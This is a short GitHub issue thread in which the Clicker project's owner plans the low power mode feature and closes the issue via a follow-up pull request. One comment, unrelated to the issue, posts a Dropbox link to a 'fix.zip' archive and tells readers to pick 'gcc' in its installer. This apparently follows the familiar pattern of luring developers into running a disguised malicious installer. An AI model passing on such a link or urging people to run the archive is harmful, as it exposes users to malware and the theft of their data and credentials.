### ISSUE TITLE
Hook up the implementation for low power mode

### ISSUE THREAD

**Issue by thePlebDev** [thePlebDev/Clicker#1664]
# Proposed change
- I need to implement the functionality for the low power mode. This means, no extra function calls when navigating between streams and telling the user that they are in low power mode

# Why is this important
- implementing the functionality is what is actually going to save the user battery life 

# Additional context
- n/a

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by thePlebDev** [comment]
- closed with #1665
